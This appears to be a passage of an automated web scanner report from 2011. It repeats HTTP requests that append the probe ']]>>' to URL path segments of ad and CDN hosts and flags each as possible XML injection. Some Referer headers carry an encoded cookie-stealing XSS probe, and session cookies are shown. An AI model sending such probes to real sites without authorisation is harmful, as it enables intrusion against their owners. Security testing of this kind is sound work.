GET /adsc]]>>/d852910/8/40051907/decide.php HTTP/1.1 Host: amch.questionmarket.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ES=823529-ie.pM-MG_844890-`:tqM-0_822109-|RIsM-26_853829-y]GsM-Bi1_847435-l^GsM-!"1_791689-/qcsM-0_852149-*jtsM-0_775684-'LysM-0_865756-tvKtM-01_852910-XHktM-0; CS1=823529-1-2_39959898-17-1_40016019-8-1_40015506-8-3_849331-6-5_825697-8-1_39942282-8-1_39823749-21-1_40142779-4-1_38973908-10-1_865756-1-6_40051907-8-1;
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 22:43:46 GMT Server: Apache/2.2.3 Vary: accept-language Accept-Ranges: bytes Keep-Alive: timeout=5, max=487 Connection: Keep-Alive Content-Type: text/html Content-Language: en Content-Length: 1065
<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang=" ...[SNIP]...
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /adscgen]]>>/st.php HTTP/1.1 Host: amch.questionmarket.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ES=823529-ie.pM-MG_844890-`:tqM-0_822109-|RIsM-26_853829-y]GsM-Bi1_847435-l^GsM-!"1_791689-/qcsM-0_852149-*jtsM-0_775684-'LysM-0_865756-tvKtM-01_852910-XHktM-0; CS1=823529-1-2_39959898-17-1_40016019-8-1_40015506-8-3_849331-6-5_825697-8-1_39942282-8-1_39823749-21-1_40142779-4-1_38973908-10-1_865756-1-6_40051907-8-1;
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 22:43:43 GMT Server: Apache/2.2.3 Vary: accept-language Accept-Ranges: bytes Keep-Alive: timeout=5, max=975 Connection: Keep-Alive Content-Type: text/html Content-Language: en Content-Length: 1065
<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang=" ...[SNIP]...
The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /adscgen/st.php]]>> HTTP/1.1 Host: amch.questionmarket.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ES=823529-ie.pM-MG_844890-`:tqM-0_822109-|RIsM-26_853829-y]GsM-Bi1_847435-l^GsM-!"1_791689-/qcsM-0_852149-*jtsM-0_775684-'LysM-0_865756-tvKtM-01_852910-XHktM-0; CS1=823529-1-2_39959898-17-1_40016019-8-1_40015506-8-3_849331-6-5_825697-8-1_39942282-8-1_39823749-21-1_40142779-4-1_38973908-10-1_865756-1-6_40051907-8-1;
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 22:43:46 GMT Server: Apache/2.2.3 Vary: accept-language Accept-Ranges: bytes Keep-Alive: timeout=5, max=77 Connection: Keep-Alive Content-Type: text/html Content-Language: en Content-Length: 1065
<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang=" ...[SNIP]...
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /kcontent]]>>/478/ktag.js HTTP/1.1 Host: amch.questionmarket.com Proxy-Connection: keep-alive Referer: http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens47888%2527%253balert%2528document.cookie%2529%252f%252f8fcf167d281/d/type/product_problem Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CS1=823529-1-2_39959898-17-1_40016019-8-1_40015506-8-3_849331-6-5_825697-8-1_39942282-8-1_39823749-21-1_40142779-4-1_38973908-10-1_865756-1-6; ES=823529-ie.pM-MG_844890-`:tqM-0_822109-|RIsM-26_853829-y]GsM-Bi1_847435-l^GsM-!"1_791689-/qcsM-0_852149-*jtsM-0_775684-'LysM-0_865756-tvKtM-01
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 22:44:42 GMT Server: Apache/2.2.3 Vary: accept-language Accept-Ranges: bytes Content-Type: text/html Content-Language: en Content-Length: 1478
<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang=" ...[SNIP]...
The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /kcontent/478]]>>/ktag.js HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens47888%2527%253balert%2528document.cookie%2529%252f%252f8fcf167d281/d/type/product_problem
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=823529-1-2_39959898-17-1_40016019-8-1_40015506-8-3_849331-6-5_825697-8-1_39942282-8-1_39823749-21-1_40142779-4-1_38973908-10-1_865756-1-6; ES=823529-ie.pM-MG_844890-`:tqM-0_822109-|RIsM-26_853829-y]GsM-Bi1_847435-l^GsM-!"1_791689-/qcsM-0_852149-*jtsM-0_775684-'LysM-0_865756-tvKtM-01
Response
HTTP/1.1 404 Not Found
Date: Sat, 05 Feb 2011 22:44:45 GMT
Server: Apache/2.2.3
Vary: accept-language
Accept-Ranges: bytes
Content-Type: text/html
Content-Language: en
Content-Length: 1478
<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang=" ...[SNIP]...
The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /kcontent/478/ktag.js]]>> HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens47888%2527%253balert%2528document.cookie%2529%252f%252f8fcf167d281/d/type/product_problem
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=823529-1-2_39959898-17-1_40016019-8-1_40015506-8-3_849331-6-5_825697-8-1_39942282-8-1_39823749-21-1_40142779-4-1_38973908-10-1_865756-1-6; ES=823529-ie.pM-MG_844890-`:tqM-0_822109-|RIsM-26_853829-y]GsM-Bi1_847435-l^GsM-!"1_791689-/qcsM-0_852149-*jtsM-0_775684-'LysM-0_865756-tvKtM-01
Response
HTTP/1.1 404 Not Found
Date: Sat, 05 Feb 2011 22:44:47 GMT
Server: Apache/2.2.3
Vary: accept-language
Accept-Ranges: bytes
Content-Type: text/html
Content-Language: en
Content-Length: 1478
<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang=" ...[SNIP]...
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /button.js]]>> HTTP/1.1
Host: api.tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: user_unique_ident=4d4300485cccb8.88856407-57c11f7a933564d3f62b1bb71b01e19d; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __qca=P0-724637325-1295907700201; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;
Response
HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Sun, 06 Feb 2011 17:18:44 GMT
Content-Type: text/xml; charset='utf-8'
Connection: close
P3P: CP="CAO PSA"
X-Served-By: h04
Content-Length: 117
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /officedepot]]>>/r2/v4b/assets/300x250.swf HTTP/1.1
Host: cdn.statics.live.spongecell.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 403 Forbidden
x-amz-request-id: D234D51148357D28
x-amz-id-2: Zds+GcEQI8qdHgrPZZnBxq8v0aufYjF5xSL+AjM67SYFJxLUCaC4DtJnbXdil6Zy
Content-Type: application/xml
Date: Sat, 05 Feb 2011 22:46:59 GMT
Server: AmazonS3
Connection: close
The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /officedepot/r2]]>>/v4b/assets/300x250.swf HTTP/1.1
Host: cdn.statics.live.spongecell.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 403 Forbidden
x-amz-request-id: 280A7AB5EA5C302C
x-amz-id-2: IOhRAAx/tsr5ypSytLaGewvhuMO8D4WhbY+uDEm11hokkmCuuEHtYRw2DW16V+cb
Content-Type: application/xml
Date: Sat, 05 Feb 2011 22:47:06 GMT
Server: AmazonS3
Connection: close
The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /officedepot/r2/v4b]]>>/assets/300x250.swf HTTP/1.1
Host: cdn.statics.live.spongecell.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 403 Forbidden
x-amz-request-id: 06E051E8A7F779FE
x-amz-id-2: RR81aybRkCfOF2vURFbUFPDaO9cbV0KDMeZvfqRbkZM1yFywrWhDScGd2t5dAacb
Content-Type: application/xml
Date: Sat, 05 Feb 2011 22:47:14 GMT
Server: AmazonS3
Connection: close
The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /officedepot/r2/v4b/assets]]>>/300x250.swf HTTP/1.1
Host: cdn.statics.live.spongecell.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 403 Forbidden
x-amz-request-id: 17BFC9E38192426D
x-amz-id-2: 9oW+dOGkuk2Ek9rcTO0dTwED+593S/pyDouRVgHzj8r81PgBxBFWYvaY0Mf2FEV1
Content-Type: application/xml
Date: Sat, 05 Feb 2011 22:47:17 GMT
Server: AmazonS3
Connection: close
The REST URL parameter 5 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 5. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /officedepot/r2/v4b/assets/300x250.swf]]>> HTTP/1.1
Host: cdn.statics.live.spongecell.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 403 Forbidden
x-amz-request-id: F09EC1139B9C2F8B
x-amz-id-2: xfHNf0fMa5b8G4hNc17mXDVVxML9J5HjCnJ0PkIgZcsO0NSP3xjbAwe6J8pKN9PA
Content-Type: application/xml
Date: Sat, 05 Feb 2011 22:47:19 GMT
Server: AmazonS3
Connection: close
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /officedepot]]>>/r2/v4b/bin/RectangleGrid.swf HTTP/1.1
Host: cdn.statics.live.spongecell.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 403 Forbidden
x-amz-request-id: 5A551C3AC0323669
x-amz-id-2: h3CjuEjm20aeIMh3mvax5apCyZrkT12z+mrD2c8UQV86ZOkHJJPgQp0PMgcAnCOH
Content-Type: application/xml
Date: Sat, 05 Feb 2011 22:46:56 GMT
Server: AmazonS3
Connection: close
The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /officedepot/r2]]>>/v4b/bin/RectangleGrid.swf HTTP/1.1
Host: cdn.statics.live.spongecell.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 403 Forbidden
x-amz-request-id: AFE38DC9E9E3200B
x-amz-id-2: 9UXiPFpXY9upXw4IO/quC3Dv52SVZLjCZRkAYl1xmDY8vdvKnyXo9/vkhZhbJ7jb
Content-Type: application/xml
Date: Sat, 05 Feb 2011 22:47:04 GMT
Server: AmazonS3
Connection: close
The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /officedepot/r2/v4b]]>>/bin/RectangleGrid.swf HTTP/1.1
Host: cdn.statics.live.spongecell.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 403 Forbidden
x-amz-request-id: 8E0202B5D6BD0602
x-amz-id-2: ZzVkv84cOplsVqChPOf5Bpob/NAms4s7SZRGQ3v5yZlWCZBfCSheXfI3jziV2uzX
Content-Type: application/xml
Date: Sat, 05 Feb 2011 22:47:09 GMT
Server: AmazonS3
Connection: close
The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /officedepot/r2/v4b/bin]]>>/RectangleGrid.swf HTTP/1.1
Host: cdn.statics.live.spongecell.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 403 Forbidden
x-amz-request-id: 2BAAB635216ECD8F
x-amz-id-2: EYEQ5vpEeZAdFuFfpEj050sFcsj3TKP/HHDxp+kpRfS9BmLmOaGglz7zMyts8tmt
Content-Type: application/xml
Date: Sat, 05 Feb 2011 22:47:16 GMT
Server: AmazonS3
Connection: close
The REST URL parameter 5 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 5. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /officedepot/r2/v4b/bin/RectangleGrid.swf]]>> HTTP/1.1
Host: cdn.statics.live.spongecell.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 403 Forbidden
x-amz-request-id: 061A64CC2842ECD0
x-amz-id-2: qtmcWuzp7SVdTikwXUXZ3C2d/tq9l2sP4R/qrqhjMMriiMZnvlFYvU2g2GC1QGAO
Content-Type: application/xml
Date: Sat, 05 Feb 2011 22:47:18 GMT
Server: AmazonS3
Connection: close
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /officedepot]]>>/v4b/assets/Coupons1.pdf HTTP/1.1
Host: cdn.statics.live.spongecell.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 403 Forbidden
x-amz-request-id: AD51746F9153E66B
x-amz-id-2: JoWHMvZ2ww4LV2KZUc9pd7TE3UsP0u7ipmPhDb7HG9I6j+Msir4tb8DTCakFjBwk
Content-Type: application/xml
Date: Sat, 05 Feb 2011 22:46:55 GMT
Server: AmazonS3
Connection: close
The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /officedepot/v4b]]>>/assets/Coupons1.pdf HTTP/1.1
Host: cdn.statics.live.spongecell.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 403 Forbidden
x-amz-request-id: 19402391640B4383
x-amz-id-2: 2eiQyaS2QvfsdNDHvrpTyElwpb/b3dQH02lM7UlyV0xijlZRlAO0sN82WQ96O6nW
Content-Type: application/xml
Date: Sat, 05 Feb 2011 22:46:55 GMT
Server: AmazonS3
Connection: close
The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /officedepot/v4b/assets]]>>/Coupons1.pdf HTTP/1.1
Host: cdn.statics.live.spongecell.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 403 Forbidden
x-amz-request-id: D4D42DEE76A3B5D1
x-amz-id-2: 2u0eiQPOg3JyXit2U31Wp8OyuyAgBDwnn0iXpD6oHtuoC1jdXxXgQkEIotcEQZG6
Content-Type: application/xml
Date: Sat, 05 Feb 2011 22:46:57 GMT
Server: AmazonS3
Connection: close
The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /officedepot/v4b/assets/Coupons1.pdf]]>> HTTP/1.1
Host: cdn.statics.live.spongecell.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 403 Forbidden
x-amz-request-id: 9BD2EBDFA1E7ABBA
x-amz-id-2: hAKFGPEFmhv1dvMeAQzPrkltLlrXxJIuLEFu/0BQktNZNE16q51j5TStD1UnIwCh
Content-Type: application/xml
Date: Sat, 05 Feb 2011 22:46:57 GMT
Server: AmazonS3
Connection: close
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /themes]]>>/splunk_com/scripts/js/contrib/Myriad_Pro_Regular_400.font.js HTTP/1.1
Host: coverall.splunk.com
Proxy-Connection: keep-alive
Referer: http://www.splunk.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: XARAYASID=1mtgfd73mkm07svvqv720eu567; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=204527314.226449434.1296942566.1296942566.1296942566.1; __utmb=204527314.1.10.1296942566; Apache=173.193.214.243.1296942930878168
Response
HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Sat, 05 Feb 2011 22:50:28 GMT
Server: lighttpd/1.4.22
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /themes/splunk_com]]>>/scripts/js/contrib/Myriad_Pro_Regular_400.font.js HTTP/1.1
Host: coverall.splunk.com
Proxy-Connection: keep-alive
Referer: http://www.splunk.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: XARAYASID=1mtgfd73mkm07svvqv720eu567; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=204527314.226449434.1296942566.1296942566.1296942566.1; __utmb=204527314.1.10.1296942566; Apache=173.193.214.243.1296942930878168
Response
HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Sat, 05 Feb 2011 22:50:29 GMT
Server: lighttpd/1.4.22
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /themes/splunk_com/scripts]]>>/js/contrib/Myriad_Pro_Regular_400.font.js HTTP/1.1
Host: coverall.splunk.com
Proxy-Connection: keep-alive
Referer: http://www.splunk.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: XARAYASID=1mtgfd73mkm07svvqv720eu567; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=204527314.226449434.1296942566.1296942566.1296942566.1; __utmb=204527314.1.10.1296942566; Apache=173.193.214.243.1296942930878168
Response
HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Sat, 05 Feb 2011 22:50:32 GMT
Server: lighttpd/1.4.22
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /themes/splunk_com/scripts/js]]>>/contrib/Myriad_Pro_Regular_400.font.js HTTP/1.1
Host: coverall.splunk.com
Proxy-Connection: keep-alive
Referer: http://www.splunk.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: XARAYASID=1mtgfd73mkm07svvqv720eu567; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=204527314.226449434.1296942566.1296942566.1296942566.1; __utmb=204527314.1.10.1296942566; Apache=173.193.214.243.1296942930878168
Response
HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Sat, 05 Feb 2011 22:50:34 GMT
Server: lighttpd/1.4.18
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
